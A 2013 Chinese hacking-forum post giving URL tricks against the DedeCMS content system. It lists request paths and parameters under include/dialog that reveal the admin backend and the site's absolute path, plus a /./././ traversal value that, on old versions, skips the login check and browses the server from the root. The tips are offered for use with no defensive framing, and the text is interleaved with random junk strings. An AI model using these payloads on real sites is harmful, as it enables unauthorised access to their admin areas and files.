找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2227|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
- t% a! M5 u3 y& Q6 D5 @8 Z2 ?
8 c# L' Z* b1 f员帐号,新版本的就直接转向了后台.3 _' v( z" R( k# m

# H1 p3 O/ {% M4 c' F( q3 A2.include/dialog/config.php会爆出后台管理路径
0 X! R, ~; _& f& {9 Y# Y" e
6 y9 v5 ]/ W4 t' H! Z3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
1 }& f9 f$ U4 }
# }- P4 r3 Z% d4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.! O% w/ ^4 b* C, S
' r9 i1 K" t1 V; I/ g
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉+ U' I/ T& A* @: _0 _/ r
9 I2 a) d: |4 H! U; k
到根目录去.不过这些版本的访问地址有些不同.  i; R* F# F* `! m2 }  A4 {
地址为require/dialog/select_soft.php?activepath=/././././././././
  K1 B+ t  U% _# n; g  s; r* M! r) d
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
4 B9 M, G3 J, B$ e4 d. @存在相同问题的文件还有
; R# e% @; m$ a& N. y' winclude\dialog\select_images.php
6 }2 T; y) i1 u; x9 g2 Pinclude\dialog\select_media.php
$ D4 R7 i! e4 x& ]. O$ a  w* Finclude\dialog\select_templets.php​
+ N: M7 r% p# w5 c+ }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表